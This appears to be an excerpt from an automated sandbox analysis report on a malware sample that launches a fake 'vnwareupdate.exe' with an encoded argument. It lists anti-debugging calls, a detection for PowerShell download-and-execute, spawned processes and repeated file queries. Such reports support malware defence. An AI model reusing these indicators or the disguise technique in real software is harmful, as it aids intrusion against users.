Source: GZe6EcSTpO.exe, 00000000.00000002.226025578.0000000000470000.00000004.00000020.sdmp	Binary or memory string: C:\Users\user\Desktop\C:\Users\user\Desktop\vnwareupdate.exe"C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBV\Registry\Machine\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\GRE_InitializeS68AdaUj0pH0IEHv2mNV71t2soPIKLuE6vIlqTHadsqd5m4qTWlE5yUZYw6YMMgmll72lf1E232p9MVl4yhetYBzNx+sWPE+DpILBlSmddPucuORCpaLa5yzRa7ZbJ98jQfjCVZUbyNMn5Vxk30OIGoBOyrsN0VmKcdDsRZxUCHQhupf0BXrgN7wh46haut8zZzv6puQEmuGL/8u2wQFQEd9pNBJ0Rlv3QP/bjyE945wMYCc6Xz4QLd03mLiDwTqcCYAP/KGG8Yhr3pv/YbSaeW0WUI4zwTjoJArSp8wQL4F7Eb5XLV6Id8VVowmbmosktt/RQUrLvThJExvG5SvJP/mUR4/fnp2sNhMJrQ0VYv8PabCT5DFqxapVfyOG02/QYIIhU=C:\Users\user\Desktop\vnwareupdate.exeWinsta0\Default=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\U\Registry\Machine\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\Users\userp
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	Binary or memory string: $v3 = "VMWVMCIHOSTDEV" fullword ascii
Source: vnwareupdate.exe, 00000003.00000002.516586653.00000000021E0000.00000004.00000040.sdmp	Binary or memory string: C:\Users\user\Desktop\vnwareupdate.exe-rtNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVDp1EkdsXXU0eMQcUpns8p6kdiZ4rFZD4y5oVgqOEZ9Po4Z4HgwiHmPwR8ajszuHS68AdaUj0pH0IEHv2mNV71t2soPIKLuE6vIlqTHadsqd5m4qTWlE5yUZYw6YMMgmll72lf1E232p9MVl4yhetYBzNx+sWPE+DpILBlSmddPucuORCpaLa5yzRa7ZbJ98jQfjCVZUbyNMn5Vxk30OIGoBOyrsN0VmKcdDsRZxUCHQhupf0BXrgN7wh46haut8zZzv6puQEmuGL/8u2wQFQEd9pNBJ0Rlv3QP/bjyE945wMYCc6Xz4QLd03mLiDwTqcCYAP/KGG8Yhr3pv/YbSaeW0WUI4zwTjoJArSp8wQL4F7Eb5XLV6Id8VVowmbmosktt/RQUrLvThJExvG5SvJP/mUR4/fnp2sNhMJrQ0VYv8PabCT5DFqxapVfyOG02/QYIIhU=
Source: vnwareupdate.exe, 00000003.00000002.522931627.000000000237B000.00000004.00000001.sdmp	Binary or memory string: tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVDp1EkdsXXU0eMQcUpns8p6kdiZ4rFZD4y5oVgqOEZ9Po4Z4HgwiHmPwR8ajszuHS68AdaUj0pH0IEHv2mNV71t2soPIKLuE6vIlqTHadsqd5m4qTWlE5yUZYw6YMMgmll72lf1E232p9MVl4yhetYBzNx+sWPE+DpILBlSmddPucuORCpaLa5yzRa7ZbJ98jQfjCVZUbyNMn5Vxk30OIGoBOyrsN0VmKcdDsRZxUCHQhupf0BXrgN7wh46haut8zZzv6puQEmuGL/8u2wQFQEd9pNBJ0Rlv3QP/bjyE945wMYCc6Xz4QLd03mLiDwTqcCYAP/KGG8Yhr3pv/YbSaeW0WUI4zwTjoJArSp8wQL4F7Eb5XLV6Id8VVowmbmosktt/RQUrLvThJExvG5SvJP/mUR4/fnp2sNhMJrQ0VYv8PabCT5DFqxapVfyOG02/QYIIhU=q
Source: GZe6EcSTpO.exe, 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp	Binary or memory string: "C:\Users\user\Desktop\vnwareupdate.exe" -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVDp1EkdsXXU0eMQcUpns8p6kdiZ4rFZD4y5oVgqOEZ9Po4Z4HgwiHmPwR8ajszuHS68AdaUj0pH0IEHv2mNV71t2soPIKLuE6vIlqTHadsqd5m4qTWlE5yUZYw6YMMgmll72lf1E232p9MVl4yhetYBzNx+sWPE+DpILBlSmddPucuORCpaLa5yzRa7ZbJ98jQfjCVZUbyNMn5Vxk30OIGoBOyrsN0VmKcdDsRZxUCHQhupf0BXrgN7wh46haut8zZzv6puQEmuGL/8u2wQFQEd9pNBJ0Rlv3QP/bjyE945wMYCc6Xz4QLd03mLiDwTqcCYAP/KGG8Yhr3pv/YbSaeW0WUI4zwTjoJArSp8wQL4F7Eb5XLV6Id8VVowmbmosktt/RQUrLvThJExvG5SvJP/mUR4/fnp2sNhMJrQ0VYv8PabCT5DFqxapVfyOG02/QYIIhU=

Source: C:\Users\user\Desktop\vnwareupdate.exe

Code function: 3_2_00401E98 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,

3_2_00401E98

Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 3_2_00401A91 SetUnhandledExceptionFilter,	3_2_00401A91
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 3_2_00401E98 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	3_2_00401E98
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 3_2_02CFAD3E IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	3_2_02CFAD3E
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 5_2_02E0AD3E IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	5_2_02E0AD3E
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 8_2_02E6AD3E IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	8_2_02E6AD3E
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C6AD3E IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	9_2_02C6AD3E
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 10_2_02C5AD3E IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	10_2_02C5AD3E

HIPS / PFW / Operating System Protection Evasion:

Yara detected Powershell download and execute

Show sources

Source: Yara match	File source: 00000013.00000003.416791801.00000000051F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Source: C:\Users\user\Desktop\vnwareupdate.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1092'	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1136'	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1244'	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1236'	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1256'	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1300'	Jump to behavior

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVDp1EkdsXXU0eMQcUpns8p6kdiZ4rFZD4y5oVgqOEZ9Po4Z4HgwiHmPwR8ajszuHS68AdaUj0pH0IEHv2mNV71t2soPIKLuE6vIlqTHadsqd5m4qTWlE5yUZYw6YMMgmll72lf1E232p9MVl4yhetYBzNx+sWPE+DpILBlSmddPucuORCpaLa5yzRa7ZbJ98jQfjCVZUbyNMn5Vxk30OIGoBOyrsN0VmKcdDsRZxUCHQhupf0BXrgN7wh46haut8zZzv6puQEmuGL/8u2wQFQEd9pNBJ0Rlv3QP/bjyE945wMYCc6Xz4QLd03mLiDwTqcCYAP/KGG8Yhr3pv/YbSaeW0WUI4zwTjoJArSp8wQL4F7Eb5XLV6Id8VVowmbmosktt/RQUrLvThJExvG5SvJP/mUR4/fnp2sNhMJrQ0VYv8PabCT5DFqxapVfyOG02/QYIIhU=
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	Process created: C:\Users\user\Desktop\vnwareupdate.exe 'C:\Users\user\Desktop\vnwareupdate.exe' -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVDp1EkdsXXU0eMQcUpns8p6kdiZ4rFZD4y5oVgqOEZ9Po4Z4HgwiHmPwR8ajszuHS68AdaUj0pH0IEHv2mNV71t2soPIKLuE6vIlqTHadsqd5m4qTWlE5yUZYw6YMMgmll72lf1E232p9MVl4yhetYBzNx+sWPE+DpILBlSmddPucuORCpaLa5yzRa7ZbJ98jQfjCVZUbyNMn5Vxk30OIGoBOyrsN0VmKcdDsRZxUCHQhupf0BXrgN7wh46haut8zZzv6puQEmuGL/8u2wQFQEd9pNBJ0Rlv3QP/bjyE945wMYCc6Xz4QLd03mLiDwTqcCYAP/KGG8Yhr3pv/YbSaeW0WUI4zwTjoJArSp8wQL4F7Eb5XLV6Id8VVowmbmosktt/RQUrLvThJExvG5SvJP/mUR4/fnp2sNhMJrQ0VYv8PabCT5DFqxapVfyOG02/QYIIhU=			Jump to behavior

Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp

Binary or memory string: DOF_PROGMAN

Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\ad421c32-aaf8-4995-847c-18069215aace.md VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\ad421c32-aaf8-4995-847c-18069215aace.md VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\9703e260-d265-4332-8de3-4e5fab56a248.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\9703e260-d265-4332-8de3-4e5fab56a248.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\9703e260-d265-4332-8de3-4e5fab56a248.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\status.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\00554e26-4141-4a67-98c4-9454bf8d1c70.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\00554e26-4141-4a67-98c4-9454bf8d1c70.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\2a5e15fa-fe3f-471c-b784-6a56e4aeac95.bin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\fc38c7ee-ad18-4c74-a67c-9df763b1d8a4.bin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\28f4fa56-e109-42e0-9d12-1e216cf1181f.bin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\a6be3467-9cec-43b3-8e87-ded73d446923.bin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\93d72046-08db-4412-ab52-b014148c1823.bin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-filename-iocs.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\filename-iocs.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\filename-iocs.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\filename-iocs.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-filename-iocs.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-filename-iocs.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-filename-iocs.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\falsepositive-hashes.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\hash-iocs.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation
Source: C:\Users\user\Desktop\vnwareupdate.exe	Queries volume information: C:\Users\user\Desktop\otx-hash-iocs.txt VolumeInformation

Source: C:\Users\user\Desktop\vnwareupdate.exe

